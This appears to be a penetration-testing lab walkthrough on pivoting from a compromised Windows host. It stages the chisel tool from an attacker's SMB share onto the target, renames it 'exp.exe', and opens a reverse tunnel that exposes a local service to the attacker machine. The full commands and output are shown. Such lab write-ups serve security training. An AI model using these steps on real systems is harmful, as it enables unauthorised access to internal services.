How to do Port Forwarding in Windows
Port Forwarding from Windows to Linux Machine Link to heading
Let’s Assume a scenraio during the pen-testing that we have found few services are locally running and we need this application/services to be accessible from your attacker machine.
netstat -ano | findstr TCP | findstr ":0"
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 936
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5948
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 1616
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 6104
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1092
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1588
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2164
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 680
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8112
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5064
TCP [::]:135 [::]:0 LISTENING 936
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 1616
TCP [::]:8080 [::]:0 LISTENING 6104
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 1092
TCP [::]:49666 [::]:0 LISTENING 1588
TCP [::]:49667 [::]:0 LISTENING 2164
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 680
c:\Users\shaun\temp>
In this case we can 2 services are locally running which one of the service we need to make it accessible from my Attacker machine:
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8112 TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5064
In case you want to know the application or program running these you can use “tasklist /v | findstr 5064” 5064 was the process id shown above.
In this case we want to make the service runing on port 8888 accessible from my attacker machine in lab. The tool I am using is “[chisel](GitHub - jpillora/chisel: A fast TCP/UDP tunnel over HTTP)” The versions can be downloaded from here.
Download both on windows and Linux versions Link to heading
ls -al
total 23732
drwxr-xr-x 2 rocky rocky 4096 Feb 23 01:20 .
drwxr-xr-x 21 rocky rocky 4096 Feb 23 01:16 ..
-rw-r--r-- 1 rocky rocky 8077312 Jan 30 21:36 chisel_1.7.7_linux_amd64
-rw-r--r-- 1 rocky rocky 8230912 Jan 30 21:36 chisel_1.7.7_windows_amd64
-rw-r--r-- 1 rocky rocky 7981056 Jan 30 21:36 chisel_1.7.7_windows_arm64
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ impacket-smbserver smb . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
Directory of c:\Users\shaun\temp
23/02/2022 05:21 <DIR> .
23/02/2022 05:21 <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 9,817,460,736 bytes free
net use \\10.10.14.12\smb /u:df df
net use \\10.10.14.12\smb /u:df df
The command completed successfully.
copy \\10.10.14.12\smb\chisel_1.7.7_windows_amd64 exp.exe
copy \\10.10.14.12\smb\chisel_1.7.7_windows_amd64 exp.exe
1 file(s) copied.
dir
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of c:\Users\shaun\temp
23/02/2022 06:23 <DIR> .
23/02/2022 06:23 <DIR> ..
31/01/2022 02:36 8,230,912 exp.exe
1 File(s) 8,230,912 bytes
2 Dir(s) 9,809,203,200 bytes free
net use /d \\10.10.14.12\smb
net use /d \\10.10.14.12\smb
\\10.10.14.12\smb was deleted successfully.
Running Chisel as server mode in Linux(Attacker machine) Link to heading
On Attacker machine we should run it as server mode.On Kali linux end lets run this as server mode. I am using the port 8000 on Linux for port forwarding.
(rocky㉿kali)-[~/tool/exp/chisel]
└─$ sudo ./chisel_1.7.7_linux_amd64 -h 2 ⨯
Usage: chisel [command] [--help]
Version: 1.7.7 (go1.17.6)
Commands:
server - runs chisel in server mode
client - runs chisel in client mode
Read more:
https://github.com/jpillora/chisel
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ ./chisel_1.7.7_linux_amd64 server -p 8000 --reverse
2022/02/23 01:31:30 server: Reverse tunnelling enabled
2022/02/23 01:31:30 server: Fingerprint 5NdnDwnH2MLCfTDIQ5GcZMrw83etSLTjaAHTVBbs2+k=
2022/02/23 01:31:30 server: Listening on http://0.0.0.0:8000
Running Chisel in Client mode in Windows ( source Machine) Link to heading
At Windows end lets run this as client mode as this the machine where actual application service running locally. From windows machine, using Chisel we are forming a tunnel(10.10.14.12:8000) and forwarding the service 8888 through the tunnel
Directory of c:\Users\shaun\temp
23/02/2022 06:23 <DIR> .
23/02/2022 06:23 <DIR> ..
31/01/2022 02:36 8,230,912 exp.exe
1 File(s) 8,230,912 bytes
2 Dir(s) 9,809,203,200 bytes free
net use /d \\10.10.14.12\smb
net use /d \\10.10.14.12\smb
\\10.10.14.12\smb was deleted successfully.
c:\Users\shaun\temp>
.\exp.exe client 10.10.14.12:8000 R:8888:localhost:8888
.\exp.exe client 10.10.14.12:8000 R:8888:localhost:8888
2022/02/23 06:33:48 client: Connecting to ws://10.10.14.12:8000
2022/02/23 06:33:48 client: Connected (Latency 59.6776ms)
Can see the connection confirmation at server end as well:
─$ ./chisel_1.7.7_linux_amd64 server -p 8000 --reverse
2022/02/23 01:31:30 server: Reverse tunnelling enabled
2022/02/23 01:31:30 server: Fingerprint 5NdnDwnH2MLCfTDIQ5GcZMrw83etSLTjaAHTVBbs2+k=
2022/02/23 01:31:30 server: Listening on http://0.0.0.0:8000
2022/02/23 01:33:40 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
OnLinux Machine we can see the Actual port 8888(from windows) and port 8000( tunnel port) The program as Chisel
(rocky㉿kali)-[~]
└─$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp6 0 0 :::8000 :::* LISTEN 4274/./chisel_1.7.7
tcp6 0 0 :::8888 :::* LISTEN 4274/./chisel_1.7.7